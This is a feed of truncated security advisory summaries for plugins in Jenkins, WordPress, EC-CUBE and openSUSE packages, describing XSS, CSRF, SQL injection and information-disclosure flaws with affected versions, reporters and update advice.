GHSA-VWQ9-CMQR-3C8C Insertion of Sensitive Information into Log File in Jenkins Configuration as Code Plugin

Configuration as Code Plugin logs the changes it applies to the Jenkins system log. Secrets such as passwords should be masked i.e. replaced with asterisks in that log to prevent accidental disclosure. Between Configuration as Code Plugin 0.8-alpha and 1.0, log messages contained values if the...

WordPress plugin "WP Statistics" vulnerable to cross-site scripting

Overview WordPress plugin "WP Statistics" provided by VeronaLabs contains a cross-site scripting vulnerability CWE-79. Shogo Kumamaru of LAC CyberLink Co., Ltd reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. Impact...

GHSA-5PMP-7WC9-V7VW Cross-site Scripting in Jenkins JDK Parameter Plugin

Jenkins JDK Parameter Plugin 1.0 and earlier does not escape the name and description of JDK parameters on views displaying parameters. This results in stored cross-site scripting XSS vulnerabilities exploitable by attackers with Item/Configure permission. Exploitation of this vulnerability...

PT-2022-20407 · Jenkins · Blue Ocean Credentials Provider +2

Name of the Vulnerable Software and Affected Versions: Jenkins Pipeline SCM API for Blue Ocean Plugin versions 1.25.3 and earlier Description: The issue allows attackers with Job/Configure permission to access credentials with attacker-specified IDs stored in the private per-user credentials stor...

CLSA-2022-1646061262 Fix CVE(s): CVE-2022-24407

SECURITY UPDATE: SQL injection in SQL plugin - debian/patches/CVE-2022-24407.patch: escape password for SQL insert/update commands in plugins/sql.c. - CVE-2022-24407...

WordPress Security Ninja – Secure Firewall & Secure Malware Scanner plugin < 5.136 - Toggle The Debug Mode via Cross-Site Request Forgery (CSRF) vulnerability

Toggle The Debug Mode via Cross-Site Request Forgery CSRF vulnerability discovered in WordPress Security Ninja – Secure Firewall & Secure Malware Scanner plugin versions 5.136. Solution Update the WordPress Security Ninja – Secure Firewall & Secure Malware Scanner plugin to the latest available...

WordPress Top News – Best News Plugin for WordPress plugin < 2.0 - Toggle The Debug Mode via Cross-Site Request Forgery (CSRF) vulnerability

Toggle The Debug Mode via Cross-Site Request Forgery CSRF vulnerability discovered in WordPress Top News – Best News Plugin for WordPress plugin versions 2.0. Solution Update the WordPress Top News – Best News Plugin for WordPress plugin to the latest available version at least 2.0...

WordPress Plugin "Browser and Operating System Finder" vulnerable to cross-site request forgery

Overview WordPress Plugin "Browser and Operating System Finder" provided by Aftab Muni contains a cross-site request forgery vulnerability CWE-352. imai shinpei of Cryptography Laboratory,Department of Information and Communication Engineering,Tokyo Denki University reported and coordinated with...

WordPress Plugin "Push Notifications for WordPress (Lite)" vulnerable to cross-site request forgery

Overview WordPress Plugin "Push Notifications for WordPress Lite" provided by Delite Studio contains a cross-site request forgery vulnerability CWE-352. Ten Katouno of Cryptography Laboratory,Department of Information and Communication Engineering,Tokyo Denki University reported and coordinated...

WordPress Plugin "Booking Package - Appointment Booking Calendar System" vulnerable to cross-site scripting

Overview WordPress Plugin "Booking Package - Appointment Booking Calendar System" provided by Saasproject contains a cross-site scripting vulnerability CWE-79 due to the flaw in handling some URL query parameters. Gen Sato of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IP...

EC-CUBE plugin "List (order management) item change plug-in" vulnerable to cross-site scripting

Overview EC-CUBE plugin "List order management item change plug-in" provided by shiro8 Co., Ltd. contains a cross-site scripting vulnerability CWE-79. shiro8 Co., Ltd. reported this vulnerability to IPA to notify users of its solution through JVN. JPCERT/CC and shiro8 Co., Ltd. coordinated under...

Comments - wpDiscuz < 7.3.2 - Admin+ Stored Cross-Site Scripting

The plugin does not properly sanitise or escape the Follow and Unfollow messages before outputting them in the page, which could allow high privilege users to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. Timeline: May 18th, 2021 - Vendor...

Design/Logic Flaw

The WP SVG images WordPress plugin before 3.4 did not sanitise the SVG files uploaded, which could allow low privilege users such as author+ to upload a malicious SVG and then perform XSS attacks by inducing another user to access the file directly. In v3.4, the plugin restricted such upload to...

WordPress Plugin "WPCS - WordPress Currency Switcher" vulnerable to cross-site request forgery

Overview WordPress Plugin "WPCS - WordPress Currency Switcher" provided by realmag777 contains a cross-site request forgery vulnerability CWE-352. Mizuki Takagi of Cryptography Laboratory,Department of Information and Communication Engineering,Tokyo Denki University reported and coordinated with...

JVN#63066062: WordPress Plugin "WordPress Popular Posts" vulnerable to cross-site scripting

WordPress Plugin "WordPress Popular Posts" provided by Hector Cabrera contains a cross-site scripting vulnerability CWE-79. Impact A user with the administrative privilege may unintentionally execute a script on his/her web browser. Solution Update the plugin Update the plugin according to the...

WordPress plugin "Fudousan plugin" series vulnerable to cross-site scripting

Overview Some of WordPress plugin "Fudousan plugin" series provided by nendeb contain a cross-site scripting vulnerability CWE-79. Yu Iwama of Secure Sky Technology Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning...

WordPress plugin "Paid Memberships Pro" vulnerable to SQL injection

Overview WordPress Plugin "Paid Memberships Pro" contains an SQL injection vulnerability CWE-89. Gen Sato of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to the developer and coordinated on his own. After coordination was completed, this case was reported to JPCERT/CC, and...

OPENSUSE-SU-2020:2344-1 Security update for PackageKit

This update for PackageKit fixes the following issue: - CVE-2020-16121: Fixed an Information disclosure in InstallFiles, GetFilesLocal and GetDetailsLocal bsc1176930. - Update summary and description of gstreamer-plugin and gtk3-module. bsc1104313 This update was imported from the...

openSUSE Security Update : claws-mail (openSUSE-2020-1822)

This update for claws-mail fixes the following issues : - Additional cleanup of the template handling claws-mail was updated to 3.17.8 boo1177967 - Shielded template's |program and |attachprogram so that the command-line that is executed does not allow sequencing such as with && || ;, preventing...

WordPress Plugin "Social Sharing Plugin" vulnerable to cross-site request forgery

Overview WordPress Plugin "Social Sharing Plugin" provided by Social Rocket contains a cross-site request forgery vulnerability CWE-352. Akio Furui of Cryptography Laboratory, Department of Information and Communication Engineering, Tokyo Denki University reported this vulnerability to the...